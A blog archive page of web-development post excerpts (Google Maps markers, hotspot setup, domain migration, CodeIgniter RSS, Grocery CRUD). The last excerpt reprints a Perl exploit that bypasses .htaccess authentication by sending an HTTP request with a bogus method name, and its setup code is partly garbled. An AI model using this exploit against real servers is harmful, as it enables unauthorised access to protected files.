Showing posts with label Web Apps.. Show all posts
Showing posts with label Web Apps.. Show all posts

Friday, November 25, 2011

Viewing Longitude and Latitude Position in Google Map on your Personal Web


Some articles that I made earlier with the title Marking Locations in Google Maps on Your Personal Web whose content is a way of showing the location of the marker position on Google Map. In the article there is also a demo of how to see the position of longitude and latitude. Due to the article I will leave Viewing Position Longitude and Latitude in Google Map on your Personal Web, so in this article I will show you how to make it.
                                                 
Okay, without many strings attached, let us begin to make it. As the foundation of manufacture,

Sunday, November 20, 2011

Marking Locations in Google Maps on Your Personal Web


After making a few days ago I wrote an article how to display the google map on our own personal website, now I'll write an article how to indicate a location on google map ours is. Marker. Yes, the name of the location marked on the google map marker commonly called. Generally the picture is the same markers as the picture next to it. But did not rule out the marker image is not the same as the picture beside.
Usually the use of these markers are used to indicate a position location information. Let's say, on my blog

Wednesday, October 5, 2011

Open-Source HotSpot Anatomy – ChilliSpot, Radius and Postgres

Preface

This is the most comprehensive material that you fill find in the “!wild net!” , it will explain in theory how stuff works and how components fit with each-other.
For a techical aproach and “how to make an hostpost” you must wait.


Sunday, October 2, 2011

Migrasi Domain Blog dari Blogspot ke Domain Pribadi Anda

Migrasi Domain Blog dari Blogspot ke Domain Pribadi Anda:
Migrasi domain? Apa itu ya? Ok, sebelum kita bahas mengenai bagaimana cara "Migrasi Domain Blog dari Blogspot ke Domain Pribadi Anda", ada baiknya saya memberikan sedikit penjelasan. Apa itu domain? Jika pembaca ada yang belum mengetahui, bisa lihat pada pangertian domain. Sedangkan pengertian dari migrasi dapat dilihat pada pengertian migrasi. Dengan demikian, pengertian migrasi domain adalah proses penggantian nama domain dari satu domain ke domain yang lain dari suatu halaman web/blog namun tidak mengubah bentuk, isi, dan ciri dari web/blog itu sendiri.

Membuat RSS Feed di Code Igniter

Membuat RSS Feed di Code Igniter:
Berikut ini adalah cara simple membuat RSS Feed pada CodeIgniter :Pertama-tama kita membuat CI_Controller dengan nama class Feed :

Wednesday, August 10, 2011

How to Make CRUD Fast Using Grocery CRUD




Oke this time I'will create tutorial how to use Geocery CRUD..
this, plugin Code Igneter for CRUD with AJAX .. NICE


    * You can see some file and directory
    * Please COPY file with appropriate your CI project
        * example in  directory application/config you copy file in same directory in CI

Tuesday, April 26, 2011

.htaccess request authentication bypass exploit

.htaccess request authentication bypass exploit: "

bypass request auth di .htaccess :



?View Code LANGUAGE
use IO::Socket;
use strict;
use warnings;

# __________________________________________________
#
# ------------------------------------------------
# | htaccess request authentication bypass exploit |
# ------------------------------------------------
#
# written by katharsis - www.katharsis.x2.to
#
# __________________________________________________

< $host,
PeerPort => '80',
Proto => 'tcp',
);

my $packet =

"\x4D\x58\x48\x5A\x4D\x58\x20".$file.
"\x20\x48\x54\x54\x50\x2F\x31\x2E\x31\n".
"\x48\x6F\x73\x74\x3A\x20".$host."\n\n\n";

print $socket $packet;

while(<$socket>)
{
print;
}

close($socket);


thanks to ./kamtiez

"

Comments